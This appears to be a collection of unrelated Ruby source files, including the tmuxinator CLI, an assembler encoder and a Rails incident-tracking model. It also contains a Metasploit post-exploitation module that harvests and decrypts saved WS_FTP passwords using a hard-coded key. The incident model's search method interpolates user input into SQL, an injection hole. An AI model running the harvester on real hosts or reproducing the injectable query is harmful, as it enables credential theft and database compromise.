def suppress_mining?
@suppress_mining || zone.suppress_mining
end
def suppress!(type, is_suppressed = true)
case type
when :flight
@suppress_flight = is_suppressed
queue_message ZoneStatusMessage.new('suppress_flight' => is_suppressed)
when :guns
@suppress_guns = is_suppressed
queue_message ZoneStatusMessage.new('suppress_guns' => is_suppressed)
when :mining
@suppress_mining = is_suppressed
queue_message ZoneStatusMessage.new('suppress_mining' => is_suppressed)
end
end
end
end | 25.814815 | 79 | 0.684362 |
1c3c2f8d5975b666b7c41fe3401df0595114b42a | 294 | # frozen_string_literal: true
module Dor
class RegistrationResponse
attr_reader :params
delegate :to_json, to: :params
def initialize(p_hash)
@params = p_hash
end
def to_txt
@params[:pid]
end
def location
@params[:location]
end
end
end
| 14 | 34 | 0.639456 |
21399a9b9dd53b0111df9c3713e5975ddfd78783 | 237 | class RemoveCompletedAsDesignedAndReversedDirectionFromManeuvers < ActiveRecord::Migration
def change
remove_column :maneuvers, :completed_as_designed, :boolean
remove_column :maneuvers, :reversed_direction, :boolean
end
end
| 33.857143 | 90 | 0.827004 |
ab2176f8271728889437b6267586c80842480cdd | 949 | Pod::Spec.new do |s|
s.name = '[email protected]'
s.version = '1.2.23-SNAPSHOT'
s.license = { :type => 'PRIVATE', :text => 'PRIVATE' }
s.summary = 'Stream api port to Java 7.'
s.homepage = 'http://www.mirego.com'
s.authors = { 'Mirego, Inc.' => '[email protected]' }
s.source = { :git => '[email protected]:mirego/Lightweight-Stream-API.git', :tag => 'lightweight-stream-' + s.version.to_s }
s.requires_arc = false
s.prepare_command = <<-CMD
export ANDROID_HOME="${ANDROID_HOME:-$HOME/Library/Android/sdk}"
export J2OBJC_VERSION="${J2OBJC_VERSION:-2.5}"
./gradlew j2objc_pod
CMD
s.ios.deployment_target = '8.0'
s.osx.deployment_target = '10.6'
s.watchos.deployment_target = '2.0'
s.tvos.deployment_target = '9.0'
s.source_files = 'stream-j2objc/**/*.{h,m}'
s.header_mappings_dir = 'stream-j2objc'
s.dependency 'J2ObjC@mirego', '>= 2.5'
s.dependency 'J2ObjC@mirego/jsr305'
end
| 33.892857 | 125 | 0.653319 |
91252526a036fb8ee3d1fd3e862bd92356eb8df4 | 748 | require_relative './base_job'
module Resque
class UserMigrationJobs < BaseJob
module Export
@queue = :user_migrations
def self.perform(options = {})
Carto::UserMigrationExport.find(options['export_id']).run_export
rescue => e
CartoDB::Logger.error(exception: e, message: 'Error exporting user data', export_id: options['export_id'])
raise e
end
end
module Import
@queue = :user_migrations
def self.perform(options = {})
Carto::UserMigrationImport.find(options['import_id']).run_import
rescue => e
CartoDB::Logger.error(exception: e, message: 'Error importing user data', import_id: options['import_id'])
raise e
end
end
end
end
| 26.714286 | 114 | 0.65107 |
e8502784e0468fafaebe24c67859d150280b38bb | 204 | class PgqPlaces < Pgq::Consumer
# to insert event: PgqPlaces.my_event(1, 2, 3)
# async execute
def my_event(a, b, c)
logger.info "async call my_event with #{[a, b, c].inspect}"
end
end
| 18.545455 | 63 | 0.642157 |
e94ed7d9fd019c004981a840863221ed96bda094 | 7,638 | module Tmuxinator
class Cli < Thor
# By default, Thor returns exit(0) when an error occurs.
# Please see: https://github.com/tmuxinator/tmuxinator/issues/192
def self.exit_on_failure?
true
end
include Tmuxinator::Util
COMMANDS = {
commands: "Lists commands available in tmuxinator",
completions: "Used for shell completion",
new: "Create a new project file and open it in your editor",
open: "Alias of new",
start: <<-DESC,
Start a tmux session using a project's tmuxinator config,
with an optional [ALIAS] for project reuse
DESC
stop: <<-DESC,
Stop a tmux session using a project's tmuxinator config.
DESC
local: "Start a tmux session using ./.tmuxinator.yml",
debug: "Output the shell commands that are generated by tmuxinator",
copy: <<-DESC,
Copy an existing project to a new project and open it in
your editor
DESC
delete: "Deletes given project",
implode: "Deletes all tmuxinator projects",
version: "Display installed tmuxinator version",
doctor: "Look for problems in your configuration",
list: "Lists all tmuxinator projects"
}
package_name "tmuxinator" \
unless Gem::Version.create(Thor::VERSION) < Gem::Version.create("0.18")
desc "commands", COMMANDS[:commands]
def commands(shell = nil)
out = if shell == "zsh"
COMMANDS.map do |command, desc|
"#{command}:#{desc}"
end.join("\n")
else
COMMANDS.keys.join("\n")
end
say out
end
desc "completions [arg1 arg2]", COMMANDS[:completions]
def completions(arg)
if %w(start stop open copy delete).include?(arg)
configs = Tmuxinator::Config.configs
say configs.join("\n")
end
end
desc "new [PROJECT]", COMMANDS[:new]
map "open" => :new
map "edit" => :new
map "o" => :new
map "e" => :new
map "n" => :new
method_option :local, type: :boolean,
aliases: ["-l"],
desc: "Create local project file at ./.tmuxinator.yml"
def new(name)
project_file = find_project_file(name, options[:local])
Kernel.system("$EDITOR #{project_file}") || doctor
end
no_commands do
def find_project_file(name, local = false)
path = if local
Tmuxinator::Config::LOCAL_DEFAULT
else
Tmuxinator::Config.default_project(name)
end
if File.exists?(path)
path
else
generate_project_file(name, path)
end
end
def generate_project_file(name, path)
template = Tmuxinator::Config.default? ? :default : :sample
content = File.read(Tmuxinator::Config.send(template.to_sym))
erb = Erubis::Eruby.new(content).result(binding)
File.open(path, "w") { |f| f.write(erb) }
path
end
def create_project(project_options = {})
attach_opt = project_options[:attach]
attach = !attach_opt.nil? && attach_opt ? true : false
detach = !attach_opt.nil? && !attach_opt ? true : false
options = {
force_attach: attach,
force_detach: detach,
name: project_options[:name],
custom_name: project_options[:custom_name],
args: project_options[:args]
}
begin
Tmuxinator::Config.validate(options)
rescue => e
exit! e.message
end
end
def render_project(project)
if project.deprecations.any?
project.deprecations.each { |deprecation| say deprecation, :red }
say
print "Press ENTER to continue."
STDIN.getc
end
Kernel.exec(project.render)
end
def kill_project(project)
Kernel.exec(project.tmux_kill_session_command)
end
end
desc "start [PROJECT] [ARGS]", COMMANDS[:start]
map "s" => :start
method_option :attach, type: :boolean,
aliases: "-a",
desc: "Attach to tmux session after creation."
method_option :name, aliases: "-n",
desc: "Give the session a different name"
def start(name, *args)
params = {
name: name,
custom_name: options[:name],
attach: options[:attach],
args: args
}
project = create_project(params)
render_project(project)
end
desc "stop [PROJECT]", COMMANDS[:stop]
map "st" => :stop
def stop(name)
params = {
name: name
}
project = create_project(params)
kill_project(project)
end
desc "local", COMMANDS[:local]
map "." => :local
def local
render_project(create_project(attach: options[:attach]))
end
method_option :attach, type: :boolean,
aliases: "-a",
desc: "Attach to tmux session after creation."
method_option :name, aliases: "-n",
desc: "Give the session a different name"
desc "debug [PROJECT] [ARGS]", COMMANDS[:debug]
def debug(name, *args)
params = {
name: name,
custom_name: options[:name],
attach: options[:attach],
args: args
}
project = create_project(params)
say project.render
end
desc "copy [EXISTING] [NEW]", COMMANDS[:copy]
map "c" => :copy
map "cp" => :copy
def copy(existing, new)
existing_config_path = Tmuxinator::Config.project(existing)
new_config_path = Tmuxinator::Config.project(new)
exit!("Project #{existing} doesn't exist!") \
unless Tmuxinator::Config.exists?(existing)
new_exists = Tmuxinator::Config.exists?(new)
question = "#{new} already exists, would you like to overwrite it?"
if !new_exists || yes?(question, :red)
say "Overwriting #{new}" if Tmuxinator::Config.exists?(new)
FileUtils.copy_file(existing_config_path, new_config_path)
end
Kernel.system("$EDITOR #{new_config_path}")
end
desc "delete [PROJECT1] [PROJECT2] ...", COMMANDS[:delete]
map "d" => :delete
map "rm" => :delete
def delete(*projects)
projects.each do |project|
if Tmuxinator::Config.exists?(project)
config = Tmuxinator::Config.project(project)
if yes?("Are you sure you want to delete #{project}?(y/n)", :red)
FileUtils.rm(config)
say "Deleted #{project}"
end
else
say "#{project} does not exist!"
end
end
end
desc "implode", COMMANDS[:implode]
map "i" => :implode
def implode
if yes?("Are you sure you want to delete all tmuxinator configs?", :red)
FileUtils.remove_dir(Tmuxinator::Config.root)
say "Deleted all tmuxinator projects."
end
end
desc "list", COMMANDS[:list]
map "l" => :list
map "ls" => :list
def list
say "tmuxinator projects:"
print_in_columns Tmuxinator::Config.configs
end
desc "version", COMMANDS[:version]
map "-v" => :version
def version
say "tmuxinator #{Tmuxinator::VERSION}"
end
desc "doctor", COMMANDS[:doctor]
def doctor
say "Checking if tmux is installed ==> "
yes_no Tmuxinator::Config.installed?
say "Checking if $EDITOR is set ==> "
yes_no Tmuxinator::Config.editor?
say "Checking if $SHELL is set ==> "
yes_no Tmuxinator::Config.shell?
end
end
end
| 28.184502 | 80 | 0.581173 |
f7331dfb0075b2a4400a631f3221ef96e12f4675 | 103 | json.extract! name, :id, :e_no, :name, :created_at, :updated_at
json.url name_url(name, format: :json)
| 34.333333 | 63 | 0.718447 |
bb8d3bd7c1e97e3574266d7a9cf70962978c2565 | 5,066 | require 'minitest/autorun'
require 'mocha/mini_test'
require_relative '../test_helper'
require_relative '../../../_tests/lib/run_test_options'
class TestRunTestOptions < MiniTest::Test
def setup
@test_dir = '_tests'
@run_tests_options = RunTestOptions.new(@test_dir)
clear_env_variables
end
def teardown
clear_env_variables
end
def clear_env_variables
ENV['github_status_sha1'] = nil
ENV['github_status_context'] = nil
ENV['rhd_test'] = 'e2e'
ENV['HOST_TO_TEST'] = nil
ENV['RHD_JS_DRIVER'] = nil
end
def test_non_docker_e2e_test_execution_no_base_url_specified
Kernel.expects(:abort).with('Please specify a base url. For example --base-url=http://foo.com')
test_configuration = @run_tests_options.parse_command_line(%w(--e2e))
assert_equal('chrome', test_configuration[:browser])
assert_equal("cd #{@test_dir}/e2e && npm run e2e -- --baseUrl=", test_configuration[:run_tests_command])
end
def test_docker_e2e_test_execution_no_base_url_specified
Kernel.expects(:abort).with('Please specify a base url. For example --base-url=http://foo.com')
test_configuration = @run_tests_options.parse_command_line(%w(--e2e --use-docker --browser=chrome))
assert_equal('chrome', test_configuration[:browser])
assert_equal('npm run e2e:docker -- --baseUrl=', test_configuration[:run_tests_command])
end
def test_non_docker_e2e_test_execution
test_configuration = @run_tests_options.parse_command_line(%w(--e2e --base-url=http://foo.com))
refute(test_configuration[:docker])
assert_equal('chrome', test_configuration[:browser])
assert_equal("cd #{@test_dir}/e2e && npm run e2e -- --baseUrl=http://foo.com", test_configuration[:run_tests_command])
assert_equal(nil, ENV['github_status_sha1'])
assert_equal(nil, ENV['github_status_context'])
end
def test_default_execution_using_docker
test_configuration = @run_tests_options.parse_command_line(%w(--e2e --base-url=http://foo.com --use-docker))
assert(test_configuration[:docker])
assert_equal('chrome', test_configuration[:browser])
assert_equal('npm test -- --baseUrl=http://foo.com', test_configuration[:run_tests_command])
assert_equal('chrome', ENV['RHD_JS_DRIVER'])
assert_equal(nil, ENV['github_status_sha1'])
assert_equal(nil, ENV['github_status_context'])
end
def test_docker_execution_specifying_update_github_status
test_configuration = @run_tests_options.parse_command_line(%w(--e2e --base-url=http://foo.com --use-docker --update-github-status=123))
assert(test_configuration[:docker])
assert_equal('npm test -- --baseUrl=http://foo.com', test_configuration[:run_tests_command])
assert_equal('123', ENV['github_status_sha1'])
assert_equal('FE:node-e2e-tests', ENV['github_status_context'])
assert_equal('true', ENV['github_status_enabled'])
end
def test_docker_execution_specifying_docker_firefox_browser
test_configuration = @run_tests_options.parse_command_line(%w(--e2e --base-url=http://foo.com --use-docker --browser=firefox))
assert(test_configuration[:docker])
assert_equal('firefox', test_configuration[:browser])
assert_equal('npm run e2e:docker -- --baseUrl=http://foo.com', test_configuration[:run_tests_command])
assert_equal('firefox', ENV['RHD_JS_DRIVER'])
assert_equal('firefox', test_configuration[:docker_node])
assert_equal(nil, ENV['github_status_sha1'])
assert_equal(nil, ENV['github_status_context'])
end
def test_docker_execution_specifying_remote_browser
ENV['RHD_BS_AUTHKEY'] = '12345'
ENV['RHD_BS_USERNAME'] = 'foobar'
test_configuration = @run_tests_options.parse_command_line(%w(--e2e --base-url=http://foo.com --use-docker --use-browserstack --browser=bs_ie_11))
assert(test_configuration[:docker])
assert(test_configuration[:browserstack])
assert_equal('bs_ie_11', test_configuration[:browser])
assert_equal('npm run e2e:browserstack -- --baseUrl=http://foo.com', test_configuration[:run_tests_command])
assert_equal('bs_ie_11', ENV['RHD_JS_DRIVER'])
assert_equal(nil, ENV['github_status_sha1'])
assert_equal(nil, ENV['github_status_context'])
assert_equal('12345', ENV['RHD_BS_AUTHKEY'])
assert_equal('foobar', ENV['RHD_BS_USERNAME'])
end
def test_non_docker_execution_specifying_remote_browser
ENV['RHD_BS_AUTHKEY'] = '12345'
ENV['RHD_BS_USERNAME'] = 'foobar'
test_configuration = @run_tests_options.parse_command_line(%w(--e2e --base-url=http://foo.com --use-browserstack --browser=bs_ie_11))
assert(test_configuration[:browserstack])
assert_equal('bs_ie_11', test_configuration[:browser])
assert_equal("cd #{@test_dir}/e2e && npm run e2e -- --baseUrl=http://foo.com", test_configuration[:run_tests_command])
assert_equal('bs_ie_11', ENV['RHD_JS_DRIVER'])
assert_equal(nil, ENV['github_status_sha1'])
assert_equal(nil, ENV['github_status_context'])
assert_equal('12345', ENV['RHD_BS_AUTHKEY'])
assert_equal('foobar', ENV['RHD_BS_USERNAME'])
end
end
| 42.932203 | 150 | 0.740229 |
916cb367da31c8bc31ae4f7ff6393bbdd5313642 | 140 | require 'rails_helper'
RSpec.describe ExaminationTypeSetting, type: :model do
pending "add some examples to (or delete) #{__FILE__}"
end
| 23.333333 | 56 | 0.771429 |
87e6427db2a692a5868954c7911d3fb93d50ed51 | 4,298 | # frozen_string_literal: true
class Fisk
module Instructions
# Instruction PSLLD
forms = []
operands = []
encodings = []
# pslld: mm, imm8
operands << OPERAND_TYPES[54]
operands << OPERAND_TYPES[1]
encodings << Class.new(Fisk::Encoding) {
def encode buffer, operands
add_rex(buffer, operands,
false,
0,
0,
0,
operands[0].rex_value)
add_opcode buffer, 0x0F, 0
add_opcode buffer, 0x72, 0
add_modrm(buffer,
3,
6,
operands[0].op_value, operands)
add_immediate buffer, operands[1].op_value, 1
end
def bytesize; 4; end
}.new
forms << Form.new(operands, encodings)
operands = []
encodings = []
# pslld: mm, mm
operands << OPERAND_TYPES[54]
operands << OPERAND_TYPES[36]
encodings << Class.new(Fisk::Encoding) {
def encode buffer, operands
add_rex(buffer, operands,
false,
0,
operands[0].rex_value,
0,
operands[1].rex_value)
add_opcode buffer, 0x0F, 0
add_opcode buffer, 0xF2, 0
add_modrm(buffer,
3,
operands[0].op_value,
operands[1].op_value, operands)
end
def bytesize; 3; end
}.new
forms << Form.new(operands, encodings)
operands = []
encodings = []
# pslld: mm, m64
operands << OPERAND_TYPES[54]
operands << OPERAND_TYPES[18]
encodings << Class.new(Fisk::Encoding) {
def encode buffer, operands
add_rex(buffer, operands,
false,
0,
operands[0].rex_value,
operands[1].rex_value,
operands[1].rex_value)
add_opcode buffer, 0x0F, 0
add_opcode buffer, 0xF2, 0
add_modrm(buffer,
0,
operands[0].op_value,
operands[1].op_value, operands)
end
def bytesize; 3; end
}.new
forms << Form.new(operands, encodings)
operands = []
encodings = []
# pslld: xmm, imm8
operands << OPERAND_TYPES[23]
operands << OPERAND_TYPES[1]
encodings << Class.new(Fisk::Encoding) {
def encode buffer, operands
add_prefix buffer, operands, 0x66, true
add_rex(buffer, operands,
false,
0,
0,
0,
operands[0].rex_value)
add_opcode buffer, 0x0F, 0
add_opcode buffer, 0x72, 0
add_modrm(buffer,
3,
6,
operands[0].op_value, operands)
add_immediate buffer, operands[1].op_value, 1
end
def bytesize; 4; end
}.new
forms << Form.new(operands, encodings)
operands = []
encodings = []
# pslld: xmm, xmm
operands << OPERAND_TYPES[23]
operands << OPERAND_TYPES[24]
encodings << Class.new(Fisk::Encoding) {
def encode buffer, operands
add_prefix buffer, operands, 0x66, true
add_rex(buffer, operands,
false,
0,
operands[0].rex_value,
0,
operands[1].rex_value)
add_opcode buffer, 0x0F, 0
add_opcode buffer, 0xF2, 0
add_modrm(buffer,
3,
operands[0].op_value,
operands[1].op_value, operands)
end
def bytesize; 3; end
}.new
forms << Form.new(operands, encodings)
operands = []
encodings = []
# pslld: xmm, m128
operands << OPERAND_TYPES[23]
operands << OPERAND_TYPES[25]
encodings << Class.new(Fisk::Encoding) {
def encode buffer, operands
add_prefix buffer, operands, 0x66, true
add_rex(buffer, operands,
false,
0,
operands[0].rex_value,
operands[1].rex_value,
operands[1].rex_value)
add_opcode buffer, 0x0F, 0
add_opcode buffer, 0xF2, 0
add_modrm(buffer,
0,
operands[0].op_value,
operands[1].op_value, operands)
end
def bytesize; 3; end
}.new
forms << Form.new(operands, encodings)
PSLLD = Instruction.new("PSLLD", forms)
end
end
| 27.031447 | 53 | 0.531177 |
ff7cd985263e617e185a9c59d162d640bd9fd6f5 | 3,193 | ##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex'
require 'rex/parser/ini'
require 'msf/core/auxiliary/report'
class Metasploit3 < Msf::Post
include Msf::Post::Windows::Registry
include Msf::Auxiliary::Report
include Msf::Post::Windows::UserProfiles
def initialize(info={})
super( update_info( info,
'Name' => 'Windows Gather WS_FTP Saved Password Extraction',
'Description' => %q{
This module extracts weakly encrypted saved FTP Passwords
from WS_FTP. It finds saved FTP connections in the ws_ftp.ini file.
},
'License' => MSF_LICENSE,
'Author' => [ 'theLightCosine'],
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter' ]
))
end
def run
print_status("Checking Default Locations...")
grab_user_profiles().each do |user|
next if user['AppData'] == nil
check_appdata(user['AppData'] + "\\Ipswitch\\WS_FTP\\Sites\\ws_ftp.ini")
check_appdata(user['AppData'] + "\\Ipswitch\\WS_FTP Home\\Sites\\ws_ftp.ini")
end
end
def check_appdata(path)
begin
client.fs.file.stat(path)
print_status("Found File at #{path}")
get_ini(path)
rescue
print_status("#{path} not found ....")
end
end
def get_ini(filename)
config = client.fs.file.new(filename, 'r')
parse = config.read
ini = Rex::Parser::Ini.from_s(parse)
ini.each_key do |group|
next if group == "_config_"
print_status("Processing Saved Session #{group}")
host = ini[group]['HOST']
host = host.delete "\""
username = ini[group]['UID']
username = username.delete "\""
port = ini[group]['PORT']
passwd = ini[group]['PWD']
passwd = decrypt(passwd)
next if passwd == nil or passwd == ""
port = 21 if port == nil
print_good("Host: #{host} Port: #{port} User: #{username} Password: #{passwd}")
service_data = {
address: Rex::Socket.getaddress(host),
port: port,
protocol: "tcp",
service_name: "ftp",
workspace_id: myworkspace_id
}
credential_data = {
origin_type: :session,
session_id: session_db_id,
post_reference_name: self.refname,
username: username,
private_data: passwd,
private_type: :password
}
credential_core = create_credential(credential_data.merge(service_data))
login_data = {
core: credential_core,
access_level: "User",
status: Metasploit::Model::Login::Status::UNTRIED
}
create_credential_login(login_data.merge(service_data))
end
end
def decrypt(pwd)
decoded = pwd.unpack("m*")[0]
key = "\xE1\xF0\xC3\xD2\xA5\xB4\x87\x96\x69\x78\x4B\x5A\x2D\x3C\x0F\x1E\x34\x12\x78\x56\xab\x90\xef\xcd"
iv = "\x34\x12\x78\x56\xab\x90\xef\xcd"
des = OpenSSL::Cipher::Cipher.new("des-ede3-cbc")
des.decrypt
des.key = key
des.iv = iv
result = des.update(decoded)
final = result.split("\000")[0]
return final
end
end
| 28.508929 | 108 | 0.613843 |
bf8bdb358f447b84f36aa176c9e460902cedd0a2 | 14,593 | # encoding: utf-8
class Incedent < ActiveRecord::Base
include ApplicationHelper
include Workflow
workflow_column :state
workflow do
end
acts_as_nested_set
include TheSortableTree::Scopes
audit(:create) { |model, user, action| "Жалоба \"#{model.name}\" создана пользователем #{user.display_name}" }
audit(:update) { |model, user, action| "Жалоба \"#{model.name}\" изменена пользователем #{user.display_name}" }
audit(:destroy) { |model, user, action| "Пользователь #{user.display_name} удалил жалобу \"#{model.name}\"" }
before_save :default_values, :set_finish_at_to_all
belongs_to :operator, class_name: 'User', foreign_key: 'operator_id'
belongs_to :initiator, class_name: 'User', foreign_key: 'initiator_id'
belongs_to :status
belongs_to :priority
belongs_to :type
belongs_to :server
belongs_to :service_class
belongs_to :parent,
:class_name => "Incedent",
:foreign_key => "parent_id"
validates :name, :description, presence: true
has_many :incedent_observers, dependent: :delete_all
has_many :observers, through: :incedent_observers, dependent: :delete_all
has_many :incedent_workers, dependent: :delete_all
has_many :workers, through: :incedent_workers, dependent: :delete_all
has_many :incedent_reviewers, dependent: :delete_all
has_many :reviewers, through: :incedent_reviewers, dependent: :delete_all
has_many :incedent_tags, dependent: :delete_all
has_many :tags, through: :incedent_tags, dependent: :delete_all
has_many :incedent_comments, dependent: :delete_all
has_many :comments, through: :incedent_comments, dependent: :delete_all
has_many :incedent_attaches, dependent: :delete_all
has_many :attaches, through: :incedent_attaches, dependent: :delete_all
has_many :incedent_actions
has_many :childs,
:class_name => "Incedent",
:foreign_key => "parent_id",
:order => "name",
:dependent => :delete_all
accepts_nested_attributes_for :attaches, allow_destroy: true
attr_accessible :description, :name, :tags, :incedent_actions, :tag_ids, :operator, :initiator, :worker, :observer, :server, :operator_id, :initiator_id, :priority_id
attr_accessible :type_id, :status_id, :worker_id, :server_id, :closed, :reject_reason, :replay_reason, :close_reason, :work_reason, :review_reason, :attaches_attributes, :observer_id
attr_accessible :parent_id, :parent, :childs, :finish_at, :service_class_id, :state, :observers, :reviewers, :workers, :observer_ids, :reviewer_ids, :worker_ids
attr_accessor :reject_reason, :work_reason, :replay_reason, :close_reason, :review_reason
scope :not_reviewed, lambda { |user| where("id in (select incedent_id from incedent_reviewers where user_id = ? and reviewed_at is null)", user) unless user.nil? }
scope :by_tag, lambda {|tag| where("id in (select incedent_id from incedent_tags where tag_id = ?)", tag) unless tag.nil? }
scope :by_initiator, lambda { |user| where("initiator_id = ?", user) unless user.nil? }
scope :by_operator, lambda { |user| where("operator_id = ?", user) unless user.nil? }
scope :by_worker, lambda { |user| where("id in (select incedent_id from incedent_workers where user_id = ?)", user) unless user.nil? }
scope :by_observer, lambda { |user| where("id in (select incedent_id from incedent_observers where user_id = ?)", user) unless user.nil? }
scope :by_reviewer, lambda { |user| where("id in (select incedent_id from incedent_reviewers where user_id = ?)", user) unless user.nil? }
scope :by_initiator_worker_reviewer, lambda { |user| where("(initiator_id = ?) or (id in (select incedent_id from incedent_workers where user_id = ?)) or (id in (select incedent_id from incedent_reviewers where user_id = ?))", user, user, user) unless user.nil? }
scope :by_operator_initiator_worker_reviewer, lambda { |user| where("(operator_id = ?) or (initiator_id = ?) or (id in (select incedent_id from incedent_workers where user_id = ?)) or (id in (select incedent_id from incedent_reviewers where user_id = ?))", user, user, user, user) unless user.nil? }
scope :by_type, lambda { |type| where("type_id = ?", type) unless type.nil? }
scope :by_status, lambda { |status| where("status_id = ?", status) unless status.nil? }
scope :by_server, lambda { |server| where("server_id = ?", server) unless server.nil? }
scope :by_priority, lambda { |priority| where("priority_id = ?", priority) unless priority.nil? }
scope :by_parent, lambda { |parent| where("parent_id = ?", parent) unless parent.nil? }
scope :solved, lambda { |archive| where('closed = ?', archive) }
scope :closed, where("status_id = ? and closed = ?", Houston::Application.config.incedent_closed, false)
def has_parent?
!self.parent_id.nil?
end
def have_childs?
self.childs.present?
end
def parents_count
count = 0
if self.has_parent?
count = 1
count += self.parent.parents_count
end
count
end
def default_values
self.initiator_id ||= current_user
self.status_id ||= Houston::Application.config.incedent_created
self.operator_id ||= self.initiator_id
self.finish_at ||= get_datetime(DateTime.now, 8)
end
def has_worker? user = nil
if user.nil?
return self.has_workers?
else
self.incedent_workers.each do |worker|
return true if (worker.worker.id == user.id)
end
end
return false
end
def has_observer? user = nil
if user.nil?
return self.has_observers?
else
self.incedent_observers.each do |observer|
return true if (observer.observer.id == user.id)
end
end
return false
end
def has_reviewer? user = nil
if user.nil?
return self.has_reviewers?
else
self.incedent_reviewers.each do |reviewer|
return true if (reviewer.reviewer.id == user.id)
end
end
return false
end
def has_reviewed? user = nil
unless user.nil?
self.incedent_reviewers.each do |reviewer|
return true if (reviewer.reviewer.id == user.id) and (!reviewer.reviewed_at.nil?)
end
end
return false
end
def has_workers?
self.workers.present?
end
def has_observers?
self.observers.present?
end
def has_reviewers?
self.reviewers.present?
end
def has_operator?
!self.operator.nil?
end
def has_initiator?
!self.initiator.nil?
end
def has_service_class?
!self.service_class.nil?
end
def is_overdated_now? user = nil
unless user.nil?
self.incedent_workers.each do |worker|
return (worker.finish_at < get_datetime(DateTime.now, 0)) if (worker.worker.id == user.id)
end
end
return (self.finish_at < get_datetime(DateTime.now, 0))
end
def is_overdated_soon? user = nil
unless user.nil?
self.incedent_workers.each do |worker|
return ((worker.finish_at >= get_datetime(DateTime.now, 4)) && (worker.finish_at <= get_datetime(DateTime.now, 6))) if (worker.worker.id == user.id)
end
end
return ((self.finish_at >= get_datetime(DateTime.now, 4)) && (self.finish_at <= get_datetime(DateTime.now, 6)))
end
def is_overdated_review? user = nil
((self.has_reviewer? user) && (!self.has_reviewed? user) && (self.has_service_class?) && (get_datetime(self.created_at, self.service_class.review_hours) <= Time.now))
end
def is_need_review? user = nil
unless user.nil?
((self.has_reviewer? user) && (!self.has_reviewed? user))
else
((self.has_reviewers?) && (!self.has_reviewed?))
end
end
def is_played? user = nil
self.get_status Houston::Application.config.incedent_played, user
end
def is_paused? user = nil
self.get_status Houston::Application.config.incedent_paused, user
end
def is_stoped? user = nil
self.get_status Houston::Application.config.incedent_stoped, user
end
def is_rejected? user = nil
self.get_status Houston::Application.config.incedent_rejected, user
end
def is_solved? user = nil
self.status_id == Houston::Application.config.incedent_solved or self.closed
end
def is_closed? user = nil
unless user.nil?
return self.get_status Houston::Application.config.incedent_closed, user
else
self.incedent_workers.each do |worker|
return true if (self.is_closed? worker.worker)
end
end
end
def is_waited? user = nil
self.get_status Houston::Application.config.incedent_waited, user
end
def delete_observer user
self.incedent_observers.each do |observer|
observer.destroy if (observer.observer == user)
end
end
def delete_observers
self.incedent_observers.each do |observer|
observer.destroy
end
end
def add_observer user
IncedentObserver.create(incedent: self, observer: user).save
end
def delete_worker user
self.incedent_workers.each do |worker|
worker.destroy if (worker.worker == user)
end
end
def delete_workers
self.incedent_workers.each do |worker|
worker.destroy
end
end
def add_worker user, status = 3
IncedentWorker.create(incedent: self, worker: user, status_id: status).save
end
def delete_reviewer user
self.incedent_reviewers.each do |reviewer|
reviewer.destroy if (reviewer.reviewer == user)
end
end
def delete_reviewers
self.incedent_reviewers.each do |reviewer|
reviewer.destroy
end
end
def add_reviewer user
IncedentReviewer.create(incedent: self, reviewer: user).save
end
def played! user = nil
unless user.nil?
if self.is_need_review? user
self.waited! user
else
self.set_status Houston::Application.config.incedent_played, user
self.closed = false
end
else
if self.is_need_review?
self.set_status_all Houston::Application.config.incedent_waited
self.status_id = Houston::Application.config.incedent_waited
self.closed = false
else
self.set_status_all Houston::Application.config.incedent_played
self.status_id = Houston::Application.config.incedent_played
self.closed = false
end
end
end
def paused! user = nil
self.set_status Houston::Application.config.incedent_paused, user
self.closed = false
end
def stoped! user = nil
self.set_status Houston::Application.config.incedent_stoped, user
self.closed = false
end
def rejected! user = nil
self.set_status Houston::Application.config.incedent_rejected, user
self.closed = false
end
def reviewed! user = nil
unless user.nil?
self.incedent_reviewers.each do |reviewer|
if (reviewer.reviewer == user)
reviewer.reviewed_at = Time.now
reviewer.save
end
end
else
self.incedent_reviewers.each do |reviewer|
reviewer.reviewed_at = Time.now
reviewer.save
end
end
end
def unreviewed! user = nil
unless user.nil?
self.incedent_reviewers.each do |reviewer|
if (reviewer.reviewer == user)
reviewer.reviewed_at = nil
reviewer.save
end
end
else
self.incedent_reviewers.each do |reviewer|
reviewer.reviewed_at = nil
reviewer.save
end
end
end
def solved!
self.status_id = Houston::Application.config.incedent_solved
self.set_status_all Houston::Application.config.incedent_solved
self.closed = true
end
def closed! user = nil
self.set_status Houston::Application.config.incedent_closed, user
self.closed = false
end
def waited! user = nil
self.set_status Houston::Application.config.incedent_waited, user
self.status_id = Houston::Application.config.incedent_waited
self.closed = false
end
def set_status status, user = nil
unless user.nil?
if self.has_worker? user
self.incedent_workers.each do |worker|
if (worker.worker.id == user.id)
worker.status_id = status
worker.save
end
end
self.save
else
self.add_worker user, status unless (self.initiator == user) or (self.operator == user)
end
else
self.status_id = status
end
end
def set_status_all status
if self.has_workers?
self.incedent_workers.each do |worker|
worker.status_id = status
worker.save
end
end
self.status_id = status
end
def set_finish_at_to_all
if self.has_workers?
self.incedent_workers.each do |worker|
worker.finish_at = self.finish_at unless worker.destroyed?
worker.save unless worker.destroyed?
end
end
end
def get_status status, user = nil
self.incedent_workers.each do |worker|
unless user.nil?
return (worker.status_id == status) if (worker.worker.id == user.id)
else
return false if (worker.status_id != status)
end
end
return false
end
def get_status_id user = nil
self.incedent_workers.each do |worker|
unless user.nil?
return worker.status_id if (worker.worker.id == user.id)
end
end
return self.status_id
end
def get_status_name user = nil
self.incedent_workers.each do |worker|
unless user.nil?
return worker.status.name if (worker.worker.id == user.id)
end
end
return self.status.name
end
def self.to_csv(options = {})
CSV.generate(options) do |csv|
csv << column_names
all.each do |incedent|
csv << incedent.attributes.values_at(*column_names)
end
end
end
def self.search(query)
where("name like '%#{query}%' or description like '%#{query}%'")
end
def self.notify_workers
User.active.each do |user|
@incedents = Incedent.solved(false).by_worker(user)
if @incedents.present?
IncedentMailer.incedents_in_progress(@incedents, user).deliver
end
end
end
def self.autoclose!
Incedent.closed.each do |incedent|
unless incedent.service_class.nil?
if (incedent.service_class.autoclose) and get_datetime(incedent.created_at, incedent.service_class.autoclose_hours) > Time.now
incedent.add_worker User.find(1) unless incedent.has_workers?
incedent.solved!
IncedentAction.create(incedent: incedent, status: incedent.status, worker: incedent.workers).save
end
end
end
end
end
class TheIncedent < Incedent
end
class TheProblem < Incedent
end
class TheSupport < Incedent
end
class TheChange < Incedent
end
| 28.89703 | 301 | 0.687796 |
795a871fe49559c7a59fc6f9f7e8546e6782ba20 | 37 | class Tariff < ApplicationRecord
end
